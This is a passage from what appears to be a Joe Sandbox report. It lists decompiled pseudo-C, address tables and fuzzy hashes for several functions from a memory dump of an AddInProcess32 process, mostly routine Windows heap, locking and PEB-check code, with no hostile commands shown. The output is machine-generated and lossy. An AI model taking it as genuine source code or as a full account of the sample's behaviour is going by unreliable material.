				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0189F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E01877D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E01899AE0();
					_t24 = L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x018d7799
0x018d779a
0x018d779b
0x018d77a3
0x018d77ab
0x018d77ae
0x018d77b1
0x018d77b1
0x018d77bf
0x018d77c4
0x018d77c8
0x018d77ce
0x018d77d4
0x018d77e0
0x018d77e0
0x018d77d6
0x018d77d6
0x018d77de
0x00000000
0x00000000
0x018d77de
0x018d77e5
0x018d77f0
0x018d77f3
0x018d77f6
0x018d77fd
0x018d7800
0x018d780c
0x018d7818
0x018d782b
0x018d781a
0x018d7823
0x018d7823
0x018d7830
0x018d7831
0x018d7838
0x018d783d
0x018d783e
0x018d784f
0x018d784f
0x018d785a

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f88aa4725b3013a64ef3e0d2fd04be8348a195d178ab9ac6e2f18e06d88b5ff1
Instruction ID: cf58ce8c1f37f9069f8277263fc4750ca7453fc53b0fc279f163cf69c40fcf7b
Opcode Fuzzy Hash: f88aa4725b3013a64ef3e0d2fd04be8348a195d178ab9ac6e2f18e06d88b5ff1
Instruction Fuzzy Hash: 4921AE72900644AFC725DFA9D880E6BBBA8EF48340F10056DF60AC7750E634EA00CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0187AE73 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0187AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E01877D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E01877D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E01877D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E01877D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E018D7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x0187ae78
0x0187ae7c
0x0187ae7e
0x0187ae81
0x0187ae86
0x0187ae8d
0x018c2691
0x0187ae93
0x0187ae93
0x0187ae93
0x0187ae98
0x0187ae9d
0x018c26a2
0x018c26b4
0x018c26a4
0x018c26ad
0x018c26ad
0x018c26b9
0x00000000
0x018c26bb
0x00000000
0x018c26bb
0x0187aea3
0x0187aea3
0x0187aea3
0x0187aeaa
0x018c26c0
0x018c26c9
0x018c26c9
0x0187aeb3
0x018c26d4
0x018c26e1
0x00000000
0x00000000
0x018c26e7
0x018c26ee
0x018c26f0
0x018c26f9
0x018c26f9
0x018c2702
0x018c2708
0x018c2708
0x018c270b
0x018c270f
0x018c2711
0x018c2711
0x018c2725
0x018c2725
0x00000000
0x0187aeb9
0x0187aeb9
0x0187aebf
0x0187aebf
0x0187aeb3

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 9d5fbde8b67b1df254b4dfb8a2726243beeda3c28eb42044baafd5ad30a63881
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: BE21D4326016859FE716DB6CC948F257BE9EF44B54F0904A4ED04CB792E774DE40C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0188FD9B Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0188FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E018676E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0188fd9b
0x0188fda0
0x0188fda1
0x0188fdab
0x0188fdad
0x0188fdb0
0x0188fdb8
0x0188fe0f
0x0188fde6
0x0188fde9
0x0188fdec
0x018cc0c0
0x0188fdfe
0x0188fe06
0x0188fe06
0x018cc0c8
0x0188fe2d
0x0188fe2d
0x00000000
0x0188fe2d
0x018cc0d1
0x018cc0e0
0x018cc0e5
0x018cc0e5
0x018cc0e8
0x00000000
0x018cc0e8
0x0188fdf4
0x00000000
0x00000000
0x0188fdf6
0x0188fdfa
0x0188fe1a
0x0188fe1f
0x0188fe1f
0x0188fdfc
0x00000000
0x0188fdfc
0x0188fdcc
0x0188fdd0
0x0188fe26
0x00000000
0x0188fe26
0x0188fdd8
0x0188fddb
0x0188fddd
0x0188fde0
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: b2419a8466ad2bafdb9f376ae8e97667ab2507b4bf6ce6784018f896715da2c7
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 30217972600A45DBD731DF0DC540A66FBE5EB94B10F24816EEA49CB611D730EE00CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0188B390 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0188B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01872280(_t12, 0x1948608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E018900C2(0x1948608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0188b395
0x0188b3a2
0x0188b3a5
0x0188b3aa
0x0188b3b2
0x0188b3ba
0x0188b3bd
0x0188b3c0
0x0188b3c4
0x0188b3c9
0x018ca3e9
0x018ca3ed
0x018ca3f0
0x018ca3ff
0x018ca403
0x018ca409
0x00000000
0x00000000
0x018ca40b
0x018ca40b
0x018ca40f
0x018ca415
0x018ca423
0x018ca423
0x018ca415
0x0188b3d1
0x0188b3e8
0x0188b3e8
0x0188b3d9

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26d851f3303a862abb667b72e221283235c0ff3a9e8aaa69c3683023263dafae
Instruction ID: ef797124f786d44c748ea3a9f13219572bacd95605a3a3bc3f45dd8c4915bb9d
Opcode Fuzzy Hash: 26d851f3303a862abb667b72e221283235c0ff3a9e8aaa69c3683023263dafae
Instruction Fuzzy Hash: 66116B333112149BCB19DA688D81A2BB3D7EBC5770B28012DDD1AC7380D931DE02C791

Uniqueness

Uniqueness Score: -1.00%

Function 01859240 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01859240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x192f708);
				E018AD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E018995D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E018995D0();
				_t33 =  *0x19484c4; // 0x0
				L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x19484c4; // 0x0
				L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x19484c4; // 0x0
				E01872280(L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x19486b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E018995D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E018995D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01859325();
					_t50 =  *0x19484c4; // 0x0
					return E018AD0D1(L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x01859240
0x01859242
0x01859247
0x0185924c
0x0185924e
0x01859255
0x01859257
0x0185925a
0x0185925f
0x0185925f
0x01859266
0x01859271
0x01859276
0x01859279
0x0185927e
0x01859295
0x0185929a
0x018592b1
0x018592b6
0x018592d7
0x018592dc
0x018592e0
0x018592e6
0x018592e8
0x018592ee
0x01859332
0x01859333
0x01859337
0x01859338
0x0185933a
0x0185933a
0x0185933d
0x01859342
0x01859342
0x01859345
0x01859349
0x0185934e
0x01859352
0x01859357
0x018592f4
0x018592f4
0x018592f6
0x018592f9
0x01859300
0x01859306
0x01859324
0x01859324

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0caa90c53cfcee2620d8bf4d9b09062dc2f1addfc7ef3a27e5f1d6635bbd81bf
Instruction ID: f090b9bc2076bec85ad1e9322d60b31992e232f3aeb43b4a8d992957507db532
Opcode Fuzzy Hash: 0caa90c53cfcee2620d8bf4d9b09062dc2f1addfc7ef3a27e5f1d6635bbd81bf
Instruction Fuzzy Hash: 51212532441A01DFCB62EF6CCA44F5AB7B9FF28709F15456CE149C6AA2CB34EA41CB45

Uniqueness

Uniqueness Score: -1.00%

Function 018E4257 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E018E4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x19308d0);
				E018AD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E018E41E8(__ebx, __edi, __ecx, _t39);
				E0186EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x19487e4;
					_t18 =  *0x19487e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1945cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x19487e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x19487e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L01857055(_t31 + 0xfffffff8);
								_t24 =  *0x19487e0; // 0x0
								_t18 = _t24 - 1;
								 *0x19487e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1945cd0;
				if( *0x1945cd0 <= 0) {
					L01857055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x19487e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x19487e8 = _t30;
						 *0x19487e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E018AD0D1(L018E4320());
			}

0x018e4257
0x018e4257
0x018e4257
0x018e4259
0x018e425e
0x018e4263
0x018e4265
0x018e4273
0x018e4278
0x018e427c
0x018e427f
0x018e4281
0x018e4287
0x018e42d7
0x018e42d7
0x018e42da
0x018e428d
0x018e428d
0x018e428f
0x018e4292
0x018e4297
0x018e429c
0x018e42a0
0x018e42a6
0x018e42a8
0x018e42ae
0x018e42b3
0x00000000
0x018e42ba
0x018e42ba
0x018e42bf
0x018e42c5
0x018e42ca
0x018e42cf
0x018e42d0
0x00000000
0x018e42d0
0x018e42b3
0x00000000
0x018e42a6
0x018e429c
0x018e42dc
0x018e42dc
0x018e42e3
0x018e4309
0x018e42e5
0x018e42e5
0x018e42e8
0x018e42ee
0x018e42f0
0x00000000
0x018e42f2
0x018e42f2
0x018e42f4
0x018e42f7
0x018e42f9
0x018e4300
0x018e4300
0x018e42f0
0x018e430e
0x018e431f

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0be7cb54e946410c4221e803b0326c4f9c4cc0a42ae7014abdf22cfc35fc53
Instruction ID: 7e5a8ef5ee099ef4ceb3e07b5b2cf929ca824f2195868f10f14dda23e92ee03b
Opcode Fuzzy Hash: 4e0be7cb54e946410c4221e803b0326c4f9c4cc0a42ae7014abdf22cfc35fc53
Instruction Fuzzy Hash: 14219D78904701CFCB25EFA8D014E24BBF1FB86315B55826EC10DCBA99DB32D691CB01

Uniqueness

Uniqueness Score: -1.00%

Function 01882397 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E01882397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x194848c != 0) {
					L0187FAD0(0x1948610);
					if( *0x194848c == 0) {
						E0187FA00(0x1948610, _t19, _t27, 0x1948610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01882581(0x1948610, 0x18350a0, _t26, _t27, _t28);
						E0187FA00(0x1948610, 0x18350a0, _t27, 0x1948610);
					}
				} else {
					L1:
					_t11 =  *0x1948614; // 0x0
					if(_t11 == 0) {
						_t11 = E01894886(0x1831088, 1, 0x1948614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01882581(0x1948610, (_t11 << 4) + 0x1835070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x018823b0
0x018823b6
0x01882409
0x01882415
0x018c5ae9
0x00000000
0x0188241b
0x0188241b
0x0188241d
0x01882427
0x0188242e
0x01882430
0x01882430
0x018823b8
0x018823b8
0x018823b8
0x018823bf
0x018823fc
0x018823fc
0x018823c1
0x018823c3
0x018823d0
0x018823d8
0x018823d8
0x018823dc
0x018823de
0x018823e1
0x018823e1
0x018823ec

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c020ec5e9e1022a2645ab0c3a6e91fff493f97b17dcb493033bbcd3a663048df
Instruction ID: 138819e8ad43d8688e234673a311455ee6de762ba9f701be80fc4e6007f6f343
Opcode Fuzzy Hash: c020ec5e9e1022a2645ab0c3a6e91fff493f97b17dcb493033bbcd3a663048df
Instruction Fuzzy Hash: 27114E7174430167E770BA6E9C90F1AF6DAFBA0B50F18402AF706D7291D5B0EB05C795

Uniqueness

Uniqueness Score: -1.00%

Function 018D46A7 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E018D46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0189F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0188D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L018777F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x018d46b7
0x018d46ba
0x018d46c5
0x018d46c8
0x018d46d0
0x018d46d4
0x018d46e6
0x018d46e9
0x018d46f4
0x018d46ff
0x018d4705
0x018d4706
0x018d470c
0x018d4713
0x018d471b
0x018d4723
0x018d4725
0x018d46d6
0x018d46d9
0x018d46db
0x018d46db
0x018d4732

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: aa0cae1fa42587fc3398c05137dacb138d78f4090d1318b050188395c26abf5d
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 8811E572504208BFCB059F5CE8808BEBBB9EF95314F10806AF944C7351DA319E55D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 018937F5 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E018937F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E01872280(_t6, 0x1948550);
				}
				_t29 = E0189387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0186FFB0(0x1948550, _t27, 0x1948550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x018937fa
0x018937fc
0x01893805
0x01893808
0x01893808
0x01893814
0x01893818
0x01893846
0x01893848
0x0189384b
0x0189384b
0x01893852
0x00000000
0x01893854
0x01893856
0x00000000
0x00000000
0x01893863
0x00000000
0x01893863
0x0189381a
0x0189381a
0x0189381f
0x0189386e
0x0189386e
0x01893871
0x01893873
0x01893873
0x01893868
0x00000000
0x01893868
0x01893821
0x01893826
0x00000000
0x00000000
0x01893828
0x0189382a
0x01893841
0x00000000
0x01893841

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cea70f299a8a7ba0fd30369ffbb7896a755c4fac607a024724bdbde7df92b48
Instruction ID: b0b1afdafbba0a81fe7ee969fc1a08e7fd2fe111ae1bef48f49997dfb939c978
Opcode Fuzzy Hash: 8cea70f299a8a7ba0fd30369ffbb7896a755c4fac607a024724bdbde7df92b48
Instruction Fuzzy Hash: 0401D6B29016119BCB378B6D9940E26BBE6FF85B547194069ED5AEF315DB30CB01C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 0188002D Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0188002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01877D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01877D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01877D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01877D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

